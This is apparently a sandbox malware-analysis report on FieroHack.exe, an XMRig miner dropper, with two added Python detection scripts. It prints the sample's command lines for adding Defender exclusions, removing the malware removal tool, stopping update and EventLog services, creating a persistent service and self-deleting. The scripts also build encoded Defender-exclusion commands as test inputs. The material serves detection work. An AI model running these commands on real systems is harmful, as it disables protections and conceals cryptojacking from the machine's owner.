Windows Analysis Report
FieroHack.exe

Overview

General Information

Sample name:FieroHack.exe
Analysis ID:1464754
MD5:b88f61a7938ef8af011259c59efc3d3d
SHA1:ba6f4356993959799fbd88bb350558045c363a85
SHA256:640397d3d855cbb8e3400f7564294bae51d591f7adb0f7856b7acfeb47f4e3d2
Tags:exe

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates files in the system32 config directory
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sets debug register (to hijack the execution of another thread)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • FieroHack.exe (PID: 6896 cmdline: "C:\Users\user\Desktop\FieroHack.exe" MD5: B88F61A7938EF8AF011259C59EFC3D3D)
    • WeMod.exe (PID: 4340 cmdline: C:\Users\user\AppData\Roaming\WeMod.exe MD5: 6A2D1FD5BA3F75656E23FEEF98269C17)
      • powershell.exe (PID: 6680 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6872 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 5820 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 7100 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1396 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2816 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2932 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 344 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 7156 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6228 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6680 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2652 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1196 cmdline: C:\Windows\system32\sc.exe delete "BFFESVJT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4180 cmdline: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5820 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6768 cmdline: C:\Windows\system32\sc.exe start "BFFESVJT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2672 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 3616 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
    • Sirus.exe (PID: 5960 cmdline: C:\Users\user\AppData\Roaming\Sirus.exe MD5: 35161C329ACE0D7440101EEBBE9BF7A4)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 2004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6680 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • leirdnhqqedj.exe (PID: 6796 cmdline: C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe MD5: 6A2D1FD5BA3F75656E23FEEF98269C17)
    • powershell.exe (PID: 4624 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5432 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3548 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 5408 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3156 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1640 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1464 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2676 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3672 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3904 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2108 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1720 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 2736 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
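The process tree above is the whole tamper-then-persist chain in one place: WeMod.exe (and later its service copy leirdnhqqedj.exe, which repeats the same steps) adds Defender exclusions for the user profile and ProgramData, uninstalls KB890830 (the Malicious Software Removal Tool), stops the update, BITS and EventLog services, zeroes the standby/hibernate timeouts so the miner keeps running, registers itself as service BFFESVJT from C:\ProgramData, and removes the dropped WeMod.exe after a three-second `choice` delay. The script below is an added example, not part of the Joe Sandbox report or of any of these samples: it matches process-creation events against one rule per step and only alerts when a single parent accounts for several distinct steps, which is exactly the shape of the tree. The events are constructed from the tree (images, PIDs and command lines copied from it; the parent PID of FieroHack.exe is a placeholder); the rule names and the alert threshold are this example's own assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon event 1 / Security 4688 style)."""
    pid: int
    parent_pid: int
    image: str
    cmdline: str


# Constructed from the process tree in this report: same images, PIDs and
# command lines. The parent of FieroHack.exe (pid 1) is a placeholder.
EVENTS = [
    ProcEvent(6896, 1, r"C:\Users\user\Desktop\FieroHack.exe",
              r'"C:\Users\user\Desktop\FieroHack.exe"'),
    ProcEvent(4340, 6896, r"C:\Users\user\AppData\Roaming\WeMod.exe",
              r"C:\Users\user\AppData\Roaming\WeMod.exe"),
    ProcEvent(6680, 4340, r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
              r"-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    ProcEvent(6872, 4340, r"C:\Windows\system32\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(7100, 4340, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    ProcEvent(2932, 4340, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop bits"),
    ProcEvent(7156, 4340, r"C:\Windows\system32\powercfg.exe",
              r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    ProcEvent(4180, 4340, r"C:\Windows\system32\sc.exe",
              r'C:\Windows\system32\sc.exe create "BFFESVJT" binpath= '
              r'"C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto"'),
    ProcEvent(5820, 4340, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog"),
    ProcEvent(2672, 4340, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WeMod.exe"'),
]

# (rule name, image suffix regex, command-line regex); names are this example's own.
RULES = [
    ("defender_exclusion", r"\\powershell\.exe$",
     r"\b(add|set)-mppreference\b.*-exclusion(path|extension|process)"),
    ("mrt_uninstall", r"\\(cmd|wusa)\.exe$",          # KB890830 = Malicious Software Removal Tool
     r"\bwusa\b.*/uninstall\s+/kb:890830"),
    ("update_service_stop", r"\\sc\.exe$",
     r"\bstop\s+(usosvc|waasmedicsvc|wuauserv|bits|dosvc)\b"),
    ("eventlog_stop", r"\\sc\.exe$", r"\bstop\s+eventlog\b"),
    ("power_timeout_zeroed", r"\\powercfg\.exe$",
     r"/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b"),
    ("service_from_programdata", r"\\sc\.exe$",
     r'\bcreate\b.*binpath=\s*"?[a-z]:\\programdata\\'),
    ("delayed_self_delete", r"\\cmd\.exe$",
     r"\bchoice\b.*/t\s+\d+\s*&\s*del\b"),
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I)) for n, i, c in RULES]


def match_rules(events):
    """Map pid -> sorted rule names whose image and command line both matched."""
    hits = {}
    for ev in events:
        names = [n for n, img, cmd in COMPILED if img.search(ev.image) and cmd.search(ev.cmdline)]
        if names:
            hits[ev.pid] = sorted(names)
    return hits


def chains_by_parent(events, min_distinct=3):
    """Aggregate hits onto the parent that spawned them. One parent hitting
    >= min_distinct different rules is the chain shown above; a lone
    'sc stop bits' from an admin script is not."""
    hits = match_rules(events)
    by_parent = {}
    for ev in events:
        for name in hits.get(ev.pid, ()):
            by_parent.setdefault(ev.parent_pid, set()).add(name)
    return {ppid: techs for ppid, techs in by_parent.items() if len(techs) >= min_distinct}


def describe(events, min_distinct=3):
    images = {ev.pid: ev.image for ev in events}
    return [f"pid {ppid} ({images.get(ppid, '?')}) spawned {len(t)} tamper steps: {', '.join(sorted(t))}"
            for ppid, t in chains_by_parent(events, min_distinct).items()]


if __name__ == "__main__":
    for line in describe(EVENTS):
        print(line)
```

Grouping by parent is what keeps this usable outside a sandbox: each individual command (`sc stop bits`, a `powercfg /x` change) is something an administrator might legitimately run, while seven of them from the same freshly dropped binary in AppData is not.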
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: 00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security
Source: Process Memory Space: explorer.exe PID: 2736; Rule: JoeSecurity_Xmrig; Description: Yara detected Xmrig cryptocurrency miner; Author: Joe Security

      Change of critical system settings

      Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7156, ProcessName: powercfg.exe

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6680, ProcessName: powershell.exe
      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6680, ProcessName: powershell.exe
      Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "BFFESVJT" binpath= "C:\ProgramData\wdcnrrcmzwhi\leirdnhqqedj.exe" start= "auto", ProcessId: 4180, ProcessName: sc.exe
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6680, ProcessName: powershell.exe
      Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2004, ProcessName: svchost.exe
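Two of the hits above come from Sigma rules that catch `Add-MpPreference` inside a `-EncodedCommand` payload as well as in clear text, which is what the `CommandLine|base64offset|contains` field in the Data lines refers to. The trick behind Sigma's `base64offset` modifier: a fixed byte string has exactly three possible base64 spellings depending on its start offset modulo 3, so a rule can pre-compute those three fragments (dropping the characters that also depend on neighbouring bytes) and search the raw command line without decoding anything. The code below is an added example, not part of the report or of the Sigma rules themselves; it reimplements the modifier for ASCII and for UTF-16LE (what PowerShell expects after `-enc`), then checks the report's clear-text command line plus two constructed encoded command lines and one benign control.

```python
import base64
import re

# Sigma base64offset: for a keyword that starts at byte offset i (mod 3) inside a
# larger blob, drop the leading/trailing base64 characters that depend on the
# unknown neighbouring bytes. Offsets as in pySigma's implementation.
START = (0, 2, 3)
END = (None, -3, -2)


def base64offset_variants(keyword: bytes) -> list:
    """The three alignment-independent base64 fragments of `keyword`."""
    variants = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + keyword).decode("ascii")
        variants.append(enc[START[i]:END[(len(keyword) + i) % 3]])
    return variants


# PowerShell cmdlet names are case-insensitive, base64 is not, so each casing
# an attacker is likely to type needs its own fragments.
KEYWORDS = ("Add-MpPreference", "Set-MpPreference", "add-mppreference", "set-mppreference")

# (keyword, encoding label, fragment) for every casing and both encodings
ENCODED = [
    (kw, enc, frag)
    for kw in KEYWORDS
    for enc, raw in (("ascii", kw.encode("ascii")), ("utf16le", kw.encode("utf-16-le")))
    for frag in base64offset_variants(raw)
]


def detect_mppreference(cmdline: str) -> list:
    """Return sorted (keyword, how) pairs found in a process command line."""
    found = set()
    lowered = cmdline.lower()
    for kw in ("add-mppreference", "set-mppreference"):
        if kw in lowered:
            found.add((kw, "plain"))
    for kw, enc, frag in ENCODED:
        if frag in cmdline:          # no lowering here: base64 is case-sensitive
            found.add((kw, f"base64offset/{enc}"))
    return sorted(found)


def encode_for_powershell(script: str) -> str:
    """What -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Command line copied from this report (clear text)
PLAIN_CMD = ("C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe Add-MpPreference "
             "-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force")
# Constructed: the same cmdlet hidden behind -enc, with the keyword at two different
# byte alignments (offset 0 and offset 10, i.e. 0 and 1 mod 3)
ENC_CMD_ALIGNED = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
    "Add-MpPreference -ExclusionPath $env:ProgramData -Force")
ENC_CMD_SHIFTED = "powershell.exe -enc " + encode_for_powershell(
    "$x=1;Add-MpPreference -ExclusionPath $env:ProgramData -Force")
# Constructed benign control
ENC_CMD_BENIGN = "powershell.exe -enc " + encode_for_powershell("Get-Process | Sort-Object CPU")


if __name__ == "__main__":
    for label, cmd in (("plain", PLAIN_CMD), ("aligned", ENC_CMD_ALIGNED),
                       ("shifted", ENC_CMD_SHIFTED), ("benign", ENC_CMD_BENIGN)):
        print(label, detect_mppreference(cmd))
```

The limits are the same as for the Sigma rules: a casing the rule does not list, a string split across PowerShell string concatenation, or a payload that is compressed before encoding produces none of these fragments, so this belongs next to the process-chain view above rather than on its own.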

      HIPS / PFW / Operating System Protection Evasion

      Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WeMod.exe, ParentImage: C:\Users\user\AppData\Roaming\WeMod.exe, ParentProcessId: 4340, ParentProcessName: WeMod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5820, ProcessName: sc.exe

      Snort IDS alert:
      Timestamp: 06/30/24-01:34:52.402369
      SID: 2047928
      Source Port: 57509
      Destination Port: 53
      Protocol: UDP
      Classtype: A Network Trojan was detected


      AV Detection

      Source: FieroHack.exe; Avira: detected
      Source: pool.supportxmr.com; Virustotal: Detection: 9%
      Source: FieroHack.exe; ReversingLabs: Detection: 48%
      Source: FieroHack.exe; Virustotal: Detection: 46%
      Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.7% probability

      Bitcoin Miner

      Source: Yara match; File source: 00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: Process Memory Space: explorer.exe PID: 2736, type: MEMORYSTR
      Source: FieroHack.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: FieroHack.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb; source: leirdnhqqedj.exe, 0000002B.00000003.2198922298.00000238BCBD0000.00000004.00000001.00020000.00000000.sdmp, qkrjwvgkutvb.sys.43.dr
      Source: C:\Users\user\Desktop\FieroHack.exe; Code function 0_2_0040646B: FindFirstFileA, FindClose
